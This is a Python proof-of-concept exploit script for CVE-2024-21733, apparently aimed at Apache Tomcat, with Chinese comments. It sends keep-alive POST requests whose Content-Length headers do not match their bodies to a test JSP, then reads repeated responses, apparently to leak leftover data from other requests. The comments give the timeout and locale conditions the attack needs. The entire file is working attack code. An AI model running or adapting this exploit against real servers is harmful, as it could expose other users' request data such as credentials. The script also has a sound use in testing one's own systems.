CVE-2024-21733.py

import socket

# 服务器地址和端口
server_address = ('127.0.0.1', 8080)

# 创建一个 TCP/IP 套接字
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
    # 连接到服务器
    sock.connect(server_address)
    #构造vulnerable.jsp内容
    #内容如下
    #注意1:第二个POST请求需要等待超时才能触发返回,默认20秒
    #注意2:tomcat语言环境需为英语 -Duser.language=en -Duser.country=US
    '''
    < %
        // 获取GET请求中的参数id
        String
        id = request.getParameter("id");
    
        // 打印出id的值
        if (id != null) {
        out.println("The ID is: " + id);
        } else {
        out.println("No ID parameter provided.");
        }
    % >
    '''
    request_headers = (
        "POST /vulnerable.jsp HTTP/1.1\r\n"
        "Host: localhost\r\n"
        "Connection: keep-alive\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        "Content-Length: 48\r\n"  # 实际发送的内容将少于100字节
        "\r\n"
    )
    incomplete_body = "id=123456789123456789123456789123456789123456789"
    # 发送请求头部
    sock.sendall(request_headers.encode('utf-8'))
    sock.sendall(incomplete_body.encode('utf-8'))
    response = sock.recv(2048)
    print(f"Received response1:\n{response.decode('utf-8')}")

    request_headers = (
        "POST /vulnerable.jsp HTTP/1.1\r\n"
        "Host: localhost\r\n"
        "Connection: keep-alive\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        "Content-Length: 35\r\n"
        "\r\n"
    )
    incomplete_body = "incomplete_data=00000000000"
    sock.sendall(request_headers.encode('utf-8'))
    sock.sendall(incomplete_body.encode('utf-8'))
    response = sock.recv(2048)
    print(f"Received response2:\n{response.decode('utf-8')}")
    response = sock.recv(2048)
    print(response.decode('utf-8'))
    response = sock.recv(2048)
    print(response.decode('utf-8'))
    response = sock.recv(2048)
    print(response.decode('utf-8'))
    response = sock.recv(2048)
    print(response.decode('utf-8'))
    response = sock.recv(2048)
    print(response.decode('utf-8'))
    response = sock.recv(2048)
    print(response.decode('utf-8'))
    response = sock.recv(2048)
    print(response.decode('utf-8'))
    response = sock.recv(2048)
    print(response.decode('utf-8'))
    response = sock.recv(2048)
    print(response.decode('utf-8'))
    response = sock.recv(2048)
    print(response.decode('utf-8'))
    response = sock.recv(2048)
    print(response.decode('utf-8'))
    response = sock.recv(2048)
    print(response.decode('utf-8'))
    response = sock.recv(2048)
    print(response.decode('utf-8'))
    response = sock.recv(2048)
    print(response.decode('utf-8'))
    response = sock.recv(2048)

except Exception as e:
    print(f"An error occurred: {e}")

finally:
    # 确保套接字关闭
    sock.close()